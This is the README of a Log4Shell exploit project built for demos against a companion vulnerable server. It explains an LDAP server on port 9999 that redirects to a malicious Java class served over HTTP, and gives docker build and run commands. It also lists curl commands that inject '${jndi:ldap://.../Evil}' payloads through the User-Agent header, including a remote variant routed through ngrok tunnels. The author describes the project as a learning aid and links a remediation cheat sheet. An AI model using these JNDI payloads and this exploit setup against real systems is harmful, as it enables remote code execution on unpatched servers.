Exploit for one more log4j2 (Log4Shell) vulnerable server

The server itself: https://github.com/Kirill89/log4shell-vulnerable-server

Java 8 is required.

How it works

UnboundID LDAP SDK used to run LDAP server on port 9999. For any request the server respond with the entry which points to a Java class served via HTTP server hosted on 8888 port.

Build

docker build -t log4shell-vulnerable-server-exploit .

Run locally

You need to run the vulnerable server in the docker container first.

docker run -it --rm -p 8888:8888 -p 9999:9999 --name log4shell-vulnerable-server-exploit log4shell-vulnerable-server-exploit
curl http://localhost:8000
curl --user-agent '${jndi:ldap://host.docker.internal:9999/Evil}' http://localhost:8000

Run remotely

ngrok tcp 9999
ngrok http 8888
docker run -it --rm -p 8888:8888 -p 9999:9999 --env HTTP_SERVER_HOST=http://a8465040ee4f.ngrok.io/ --name log4shell-vulnerable-server-exploit log4shell-vulnerable-server-exploit
curl http://localhost:8000
curl --user-agent '${jndi:ldap://6.tcp.ngrok.io:19132/Evil}' http://localhost:8000

Note:

• Replace ngrok hosts with yours.
• Instead of the ngrok you can use other tcp proxy or deploy the container to public address.

Log4Shell mitigation cheat sheet

https://snyk.io/blog/log4shell-remediation-cheat-sheet/

Why one more exploit?

1. Learning – I better understand things when I get my hands dirty.
2. I prefer to use my own code for various demos.
3. I like to keep thing simple. Other exploits in my opinion is too big and difficult to read.